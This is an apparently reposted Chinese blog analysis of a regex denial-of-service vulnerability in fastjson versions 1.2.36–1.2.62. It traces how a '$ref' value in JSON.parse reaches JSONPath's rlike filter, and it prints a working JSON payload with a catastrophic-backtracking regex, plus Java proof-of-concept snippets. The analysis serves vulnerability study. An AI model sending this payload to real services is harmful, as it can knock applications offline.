fastjson 正则拒绝服务简单分析

释放双眼,带上耳机,听听看~!

无意翻到b1ue大佬挖 fastjson 的拒绝服务漏洞的文章,于是跟了一下漏洞原理和触发流程,按照自己的理解简单地从结果出发开始分析。

以下复现均是在1.2.62,漏洞影响范围 1.2.36~1.2.62

漏洞缘由

首先要说明的这是一个正则DOS引起的拒绝服务,最根本的原理如下

String p = "^[a-zA-Z]+(([a-zA-Z ])?[a-zA-Z]*)*$";
String strPropertyValue = "aaaaaaaaaaaaaaaaaaaaaaaaaaaa!";
Pattern pattern = Pattern.compile(p);
Matcher m = pattern.matcher(strPropertyValue);
boolean match = m.matches();

接着看一下 fastjson 中如何使用到正则,fastjson 1.2.0 之后的版本支持 JSONPath ,可以在java框架中当作对象查询语言(OQL)来使用。

Object body = JSONPath.eval("{\"html\": {\"body\": \"bob\"}}", "$.html['body']");
System.out.println(body);
//result: bob

JSONPath 匹配中可使用正则表达式,看到官方文档有如下说明:

[key like 'aa%'] 字符串类型like过滤, 例如$.departs[name like 'sz*'],通配符只支持% 支持not like
[key rlike 'regexpr'] 字符串类型正则匹配过滤, 例如departs[name like 'aa(.)*'], 正则语法为jdk的正则语法,支持not rlike

因此如果传入的正则表达式可控可能会导致拒绝服务

Object result = JSONPath.eval("{\"dos\":\"aaaaaaaaaaaaaaaaaaaaaaaaaaaa!\"}", "[dos rlike '^[a-zA-Z]+(([a-zA-Z ])?[a-zA-Z]*)*$']");
System.out.println(result);

JSON.parse 到 JSONPath.eval

如果是使用了 JSONPath 的 rlike 实现正则表达式的匹配,那么只要正则表达式可控就直接导致拒绝服务。但是现实项目业务逻辑中很少会直接使用 JSONPath 这个模块,更别说传入的正则表达式可控了。因此需要在常规的JSON.parse 中找到一个JSONPath的调用链。

String json = "";
Object parse = JSON.parse(json);

JSON#parse函数里主要涉及三个函数,DefaultJSONParser初始化会把整个字符串进行JSON对象的转换,而parse会进入 DefaultJSONParser#parseObject 处理JSON对象。

DefaultJSONParser parser = new DefaultJSONParser(text, config, features);
Object value = parser.parse();
parser.handleResovleTask(value);

DefaultJSONParser.java 中搜索关键词 JSONPath.eval


找到 DefaultJSONParser#handleResovleTask 函数中调用了 JSONPath.eval(value, ref)

value 参数是参数传入的,ref 是从 resolveTaskList 中获取,与此相关的是比较重要的就是 addResolveTask

搜索 addResolveTask 接着就跟到了 DefaultJSONParser#parseObject 399行


可以看到当满足 key == "$ref" 、ref 不等于"@"、".."、"$" 直接进入了这个 else 分支, ref原封不动的装进了ResolveTask。

再回过去看到第一个图片,ref 第一个字符需要为 $

if (ref.startsWith("$")) {
                refValue = getObject(ref);
                if (refValue == null) {
                    try {
                        refValue = JSONPath.eval(value, ref);
                    } catch (JSONPathException ex) {
                        // skip
                    }
                }
            }

到这里已经可以推出payload(出自b1ue

{
    "regex":{
        "$ref":"$[blue rlike '^[a-zA-Z]+(([a-zA-Z ])?[a-zA-Z]*)*$']"
    },
    "blue":"aaaaaaaaaaaaaaaaaaaaaaaaaaaa!"
}

JSONPath.eval 到 Matcher.matches

从 matches 出发找到触发点 JSONPath#RlikeSegement apply方法


而 RlikeSegement 的创建是通过判断传入的 Path 字符串是否有 rlike 的OP值

Filter filter = null;
if (op == Operator.RLIKE) {
    filter = new RlikeSegement(propertyName, strValue, false);
} else if (op == Operator.NOT_RLIKE) {
    filter = new RlikeSegement(propertyName, strValue, true);

回过头来看一下 JSONPath.eval() 的具体流程


其中 segment.eval 有许多实现方法,但因为 RlikeSegement 是实现了 Filter 接口的类,因此 RlikeSegement 调用的是 FilterSegment#eval ,可以看到这里调用了 filter.apply 对应了 RlikeSegement#apply


其实可能大部分内容都和b1ue大佬写的差不多,只是这里按照自己的理解从结果“反推”的方式大致分析这个拒绝服务漏洞。当然整个过程其中很多参数提取、变化等细节是需要亲自的调试琢磨的,有兴趣也可以看看b1ue原文分析是怎么挖掘到这个漏洞。膜~

参考文章

https://b1ue.cn/archives/314.html
https://github.com/alibaba/fastjson/wiki/JSONPath
https://www.cnblogs.com/exmyth/p/9839363.html

本文来自先知社区

相关文章

人已赞赏
安全工具

简述对GhostPetya勒索病毒的一次应急响应

2020-4-2 22:08:26

安全工具

狂雨cms代码审计:后台文件包含getshell

2020-4-2 22:08:36

0 条回复 A文章作者 M管理员
    暂无讨论,说说你的看法吧
个人中心
购物车
优惠劵
今日签到
有新私信 私信列表
有新消息 消息中心
搜索